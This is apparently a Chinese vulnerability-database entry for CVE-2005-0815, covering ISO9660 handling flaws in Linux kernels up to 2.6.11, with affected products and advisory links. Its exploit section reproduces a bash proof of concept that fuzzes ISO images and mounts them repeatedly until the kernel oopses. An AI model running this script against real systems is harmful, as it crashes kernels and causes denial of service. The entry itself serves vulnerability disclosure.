Linux ISO9660文件处理多个漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108540 漏洞类型 Unknown
发布时间 2005-03-17 更新时间 2007-03-01
CVE编号 CVE-2005-0815 CNNVD-ID CNNVD-200505-598
漏洞平台 Linux CVSS评分 6.4
|漏洞来源
https://www.exploit-db.com/exploits/25234
https://www.securityfocus.com/bid/12837
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-598
|漏洞详情
Linux是一款使用非常广泛的开放源代码操作系统。在Linux的2.6.11及之前版本的ISO9660文件系统处理程序中存在几个漏洞,包括DoS到可利用的内存破坏等。在加载特制的文件系统或检查目录时可能会出现这些漏洞。
|漏洞EXP
# source: http://www.securityfocus.com/bid/12837/info
#
# The Linux kernel is reported prone to multiple vulnerabilities that occur because of "range-checking flaws" present in the ISO9660 handling routines.
#
# An attacker may exploit these issues to trigger kernel-based memory corruption. Ultimately, the attacker may be able to execute arbitrary malicious code with ring-zero privileges.
#
# These vulnerabilities are reported to be present in the ISO9660 filesystem handler including Rock Ridge and Juliet extensions for the Linux kernel up to and including version 2.6.11.
#


#!/bin/bash

cd /tmp || exit 1

echo '[*] Compiling mangler...'

cat >mangle.c <<_EOF_
char buf[10240];
main() {
  int i,x;
  srand(time(0) ^ getpid());
  while ( (i = read(0,buf,sizeof(buf))) > 0) {
    x = rand() % (i/20);
    while (x--) buf[rand() % i] = rand();
    write(1,buf,i);
  }
}
_EOF_

gcc -O3 mangle.c -o mangle || exit 1
rm -f mangle.c

echo '[*] Preparing ISO master (feel free to alter this code)...'

mkdir cd_dir || exit 1
cd cd_dir

CNT=0
while [ "$CNT" -lt "200" ]; do
  mkdir A; cd A
  CNT=$[CNT+1]
done

cd /tmp/cd_dir

A=`perl -e '{print "A"x255}' 2>/dev/null`
CNT=0
while [ "$CNT" -lt "3" ]; do
  mkdir "$A"; cd "$A"
  CNT=$[CNT+1]
done

cd /tmp

echo '[*] Creating image (alter filesystem or parameters as needed)...'

mkisofs -U -R -J -o cd.iso cd_dir 2>/dev/null || exit 1
rm -rf cd_dir

echo '[*] STRESS TEST PHASE...'

while :; do
  DIR="/tmp/cdtest-$$-$RANDOM"
  mkdir "$DIR"
  dmesg -c 2>/dev/null
  cat cd.iso | ./mangle >cd_mod.iso
  mount -t iso9660 -o loop,ro /tmp/cd_mod.iso "$DIR" 2>/dev/null
  # ls -lAR "$DIR" - Uncomment if you like when it HURTS...
  umount "$DIR" 2>/dev/null
  rm -rf "$DIR" 2>/dev/null
  FAULT=`dmesg | grep -Ei 'oops|unable to handle'`
  test "$FAULT" = "" || break
done

dmesg | tail -30

echo '[+] Something found (/tmp/cd-mod.iso)...'

rm -f cd.iso mangle
exit 0
|受影响的产品
Ubuntu Ubuntu Linux 4.1 ppc Ubuntu Ubuntu Linux 4.1 ia64 Ubuntu Ubuntu Linux 4.1 ia32 SGI ProPack 3.0 SP6 SGI ProPack 3.0 SP5 SGI ProPack 3.0 SP4 SGI ProPac
|参考资料

来源:FEDORA
名称:FLSA:152532
链接:https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=152532
来源:XF
名称:kernel-iso9660-filesystem(19741)
链接:http://xforce.iss.net/xforce/xfdb/19741
来源:BID
名称:12837
链接:http://www.securityfocus.com/bid/12837
来源:BUGTRAQ
名称:20050317LinuxISO9660handlingflaws
链接:http://www.securityfocus.com/archive/1/393590
来源:kernel.org
链接:http://kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.12-rc1
来源:REDHAT
名称:RHSA-2006:0191
链接:http://www.redhat.com/support/errata/RHSA-2006-0191.html
来源:REDHAT
名称:RHSA-2006:0190
链接:http://www.redhat.com/support/errata/RHSA-2006-0190.html
来源:REDHAT
名称:RHSA-2005:663
链接:http://www.redhat.com/support/errata/RHSA-2005-663.html
来源:REDHAT
名称:RHSA-2005:366
链接:http://www.redhat.com/support/errata/RHSA-2005-366.html
来源:MANDRIVA
名称:MDKSA-2006:072
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2006:072
来源:VUPEN
名称:ADV-2005-1878
链接:http://www.frsirt.com/english/advisories/2005/1878
来源:SECUNIA
名称:18684
链接:http://secunia.com/advisories/18684